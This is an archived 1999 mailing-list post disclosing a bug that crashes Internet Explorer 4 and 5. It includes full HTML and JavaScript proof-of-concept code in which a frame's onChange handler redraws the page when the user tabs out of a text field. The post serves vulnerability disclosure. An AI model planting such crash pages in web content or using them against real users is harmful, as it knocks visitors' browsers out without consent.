Crash IE 4/5

From: Thomas Reinke (reinke@E-SOFTINC.COM)
Date: Tue Sep 14 1999 - 10:42:52 PDT

Next message: J.A. Gutierrez: "MacOS system encryption algorithm 3"

Previous message: Vladimir Dubrovin: "Re: CGI security"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

It is possible to crash IE4/5 using a bit of dynamic HTML.
The specifics of the setup are as follows:

A page uses frames to host JavaScript code on the main page,
and uses a "main" subframe to display rendered contents calculated
by the JavaScript code. In addition, the displayed page has
event handlers on various actions that could be cause for
the page to be redrawn, by executing a function in the
parent frame.

So, if we use an "onChange" event handler in a text input
box, and the user enters data and TABS out of the box,
the onChange event handler is invoked. If the event handler
redraws the page, IE will crash. Note that if you change
the data and then CLICK on the page, the event handler
is also invoked, the page is redrawn, but the browser
does not crash.

A working version of the bug can be found at
http://www.e-softinc.com/iebug_001.html

A copy of the HTML code is shown below. The bug has
been tested to work on Windows NT IE 5.00.2314.1003,
and Windows 95 IE 4.72.3110.8

Cheers, Thomas
-------------------------------------------------------------------------
<HTML>
<HEAD>
<SCRIPT LANGUAGE="JavaScript">
<!--

function blank() {
  return "<HTML></HTML>"
}

function blank2() {
  return "<HTML><BODY onload='parent.paintme()'></BODY></HTML>"
}

function paintme() {
   main.document.write(rewrite());
   main.document.close();
}

function rewrite() {
var ns = '<HTML> \r\n\
<HEAD> \r\n\
<title>Buy Investments</title> \r\n\
</HEAD> \r\n\
<BODY>\r\n\
To crash your browser (if you are running IE), enter a value in the\r\n\
first field and press <TAB> (which would normally move you to the\r\n\
second field).\r\n\
<P>\r\n\
<FORM name=dummy>\r\n\
<TABLE>\r\n\
    <TR>\r\n\
        <TD align=right>A text field</td>\r\n\
        <TD><INPUT TYPE=text name=number
onChange="parent.paintme()"></td>\r\n\
    </TR>\r\n\
    <TR>\r\n\
        <TD align=right>A dummy field we want to tab to:</td>\r\n\
        <TD><INPUT TYPE=text name=number2></td>\r\n\
    </TR>\r\n\
</table>\r\n\
</FORM>\r\n\
</BODY>\r\n\
</HTML>'

return ns
}
//-->
</SCRIPT>
</HEAD>
<FRAMESET ROWS="1,*" FRAMEBORDER=0 FRAMESPACING=0>
    <FRAME NAME="blank" SCROLLING=NO SRC="javascript:parent.blank()">
    <FRAME NAME="main" SRC="javascript:parent.blank2()">
</FRAMESET>
</HTML>
------------------------------------------------------------
Thomas Reinke                            Tel: (416) 460-7021
Director of Technology                   Fax: (416) 598-2319
E-Soft Inc.                         http://www.e-softinc.com

Next message: J.A. Gutierrez: "MacOS system encryption algorithm 3"
Previous message: Vladimir Dubrovin: "Re: CGI security"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:03:49 PDT